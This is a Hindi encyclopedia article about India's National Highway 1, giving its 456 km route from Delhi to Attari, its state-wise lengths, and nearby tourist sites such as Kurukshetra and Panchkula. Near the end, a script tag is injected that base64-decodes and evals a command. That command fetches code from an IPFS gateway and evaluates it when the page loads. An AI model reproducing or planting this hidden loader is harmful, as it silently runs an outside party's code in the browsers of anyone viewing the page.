राष्ट्रीय राजमार्ग 1

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
राष्ट्रीय राजमार्ग 1
राष्ट्रीय राजमार्ग संख्या 1
लम्बाई 456 किमी
राज्य दिल्ली (22), हरियाणा (180), पंजाब (254)
कहाँ से दिल्ली
कहाँ तक अटारी (भारत-पाकिस्तान सीमा)
मुख्य जंक्शन सोनीपत, अम्बाला, लुधियाना, जालंधर, अमृतसर
संबंधित लेख एक्सप्रेस वे, राष्ट्रीय राजमार्ग, भारतीय सड़क नेटवर्क, भारत के राष्ट्रीय राजमार्गों की सूची

राष्ट्रीय राजमार्ग 1 (अंग्रेज़ी: National Highway 1 अथवा NH1) 456 किलोमीटर लंबा है जो राजकीय राजमार्ग दिल्ली से भारत-पाकिस्तान की सीमा के पास अटारी तक जाता है। इसका रूट दिल्ली - अम्बाला - जालंधर - अमृतसर - अटारी है। यह हाईवे दिल्ली को अमृतसर से जोड़ता है। रास्ते में पानीपत, अम्बाला, लुधियाना और जालंधर शहर आते हैं। इनके अलावा इस रूट पर कई पर्यटन स्थल भी हैं। पानीपत के पास कालाम्ब एक मिनी सैरगाह है। यह स्थल पानीपत की लड़ाई से ताल्लुक रखता है। कालाम्ब से नाहन होते हुए हिमाचल प्रदेश में रेणुका झील जाया जा सकता है। यहां पहाड़ों के मध्य फैली झील के आसपास किसी गेस्ट हाउस में रुक प्रकृति का मजा उठा सकते हैं। दिल्ली से 156 कि.मी. दूर स्थित धार्मिक स्थल कुरुक्षेत्र में मंदिरों के दर्शन कर सकते हैं। यहीं ज्योतिसर नामक स्थान गीता उपदेश की जगह है। हरियाणा का आधुनिक शहर पंचकुला भी पर्यटन का आकर्षण केंद्र है। यहां का कैक्टस गार्डन, मनसा देवी मंदिर दर्शनीय हैं। इसके निकट 350 वर्ष पुराना रामगढ़ फोर्ट आज एक हेरिटेज होटल है। पंचकुला से सैलानी पिंजौर गार्डन, नालागढ़ फोर्ट और मोरनी हिल्स भी जा सकते हैं।

राष्ट्रीय राजमार्ग 1 की लम्बाई
क्रम संख्या राज्य यात्रा मार्ग (रूट) लम्बाई (कि.मी.)
1 दिल्ली दिल्ली 22
2 हरियाणा सोनीपत - कुरुक्षेत्र 180
3 पंजाब अम्बाला, जालंधर, लुधियाना- फगवाड़ा - अमृतसर - अटारी (भारत-पाकिस्तान सीमा) 254
कुल यात्रा मार्ग 456


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख